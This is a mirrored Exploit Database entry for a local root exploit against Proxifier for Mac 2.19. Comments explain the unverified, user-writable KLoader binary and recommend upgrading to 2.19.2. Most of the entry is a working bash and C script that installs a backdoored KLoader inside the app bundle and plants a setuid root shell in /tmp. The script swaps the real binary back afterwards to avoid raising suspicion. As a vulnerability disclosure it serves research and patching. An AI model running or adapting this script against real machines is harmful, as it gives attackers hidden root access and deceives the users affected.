Proxifier for Mac 2.19 – Local Privilege Escalation

• Exploit Database
• 111 阅读

• 作者： Mark Wadham
  日期： 2017-12-06
• 类别：

  • local
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/43225/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88

  # With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader # binary that ships with Proxifier <= 2.18. # # Unfortunately 2.19 is also vulnerable to a slightly different attack that # yields the same result. # # When Proxifier is first run, if the KLoader binary is not suid root it gets # executed as root by Proxifier.app (the user is prompted to enter an admin # password).The KLoader binary will then make itself suid root so that it # doesn&apos;t need to prompt the user again. # # The Proxifier developers added parameter sanitisation and kext signature # verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app # does no verification of the KLoader binary that gets executed as root. # # The directory KLoader sits in is not root-owned so we can replace it with # our own binary that will get executed as root when Proxifier starts. # # To avoid raising any suspicion, as soon we get executed as root we can swap # the real KLoader binary back into place and forward the execution call on # to it.It does require the user to re-enter their credentials the next time # Proxifier is run but it&apos;s likely most users wouldn&apos;t think anything of this. # # Users should upgrade to version 2.19.2. # # https://m4.rkw.io/proxifier_privesc_219.sh.txt # 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac # -------------------------------------------------------------------   #!/bin/bash   ##################################################################### # Local root exploit for vulnerable KLoader binary distributed with # # Proxifier for Mac v2.19 # ##################################################################### # by m4rkw,shouts to #coolkids :P # #####################################################################   cat > a.c <<EOF #include <stdio.h> #include <unistd.h>   int main() { setuid(0); seteuid(0);   execl("/bin/bash", "bash", NULL); return 0; } EOF   gcc -o /tmp/a a.c   cat > a.c <<EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h>   int main(int ac, char *av[]) { if (geteuid() != 0) { printf("KLoader: UID not set to 0\n"); return 104; } else { seteuid(0); setuid(0);   chown("/tmp/a", 0, 0); chmod("/tmp/a", strtol("4755", 0, 8)); rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader"); chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0); chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8)); execv("/Applications/Proxifier.app/Contents/KLoader", av);   return 0; } } EOF   mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2 gcc -o /Applications/Proxifier.app/Contents/KLoader a.c rm -f a.c   echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."